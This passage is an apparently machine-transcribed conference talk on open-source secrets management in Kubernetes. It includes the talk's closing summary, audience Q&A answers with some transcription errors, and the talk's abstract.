within the Kubernetes cluster and will handle requests from parts to get secrets using the Kubernetes API. The controller will fetch the secrets from the kms to safely store them within the Kubernetes cluster and will decrypt them and expose them to the parts on demand. So, pretty good solution so far, those two open source projects. But let's summarize what we discussed about with some food for touts. First thing is to understand the options to deal with secrets and how secrets work from a Kubernetes resource management standpoint. Then try to answer the questions about what is already available in your infrastructure and your commitment to a cloud-native development using DevOps concepts like GitOps or infrastructure as a code. The last question that comes in mind when looking at the existing solution is why there is not much love to secret management considering the design document dating from 2017. And finally, for everything you're trying to do in your infrastructure, just apply the KISS principle. Keep it simple and a bit stupid at the end. Thank you for watching and have a good first time 2021. you you you you you you you you you you you you you you Hi everyone, so to answer a deal, I never used it. So usually KMS are a pretty good solution because it really gives you the opportunity to have a real solution to secure your secrets. And then it's depending if there's already some modules available from a from from a Kubernetes perspective or container perspective to have a sidecar, for example, to fetch the secrets, that would be perfect. It looks like it is a code native that the solution you're mentioning. So I would expect indeed a sidecar for this. So I'm quite interesting interested about it and I will look into this definitely. Oh, I don't know. This is a pretty good question. So not as much people actually. This is this is something that we don't see much from a CI CD workflow perspective. I was mentioning putting in prediction, field secret. That's the only time I've seen it. And that was scary for the customer from a security standpoint at some point. But at the end of the day, it really is the concept of a similar password for service, because they could not just have a well known password that exists for years. But we knew that password at the time of the deployment and deploy that password on the different instances so that each time you deploy a new version of the application or
With containers being deployed at scale on Kubernetes, there is more than ever the needs of introducing proper Secrets management to address in and out services. While there are dozens of Network related open source projects, there is not much about the art of Secrets and almost none being to be part of the Cloud Native Computing Foundation landscape. This talk provides an overview of the open source state of Secrets management. When deploying containers at scale by the hundreds or thousands, the Secrets management is always one of the most difficult topic to take on. Kubernetes by itself doesn't provide a real secure solution and any other solutions are either a pseudo open source solution calling for budget to move to the Enterprise version or calling for a true mental shift that scares Security Officers. This talk call provides an overview of these projects and concepts, why they are nice but sometimes scary.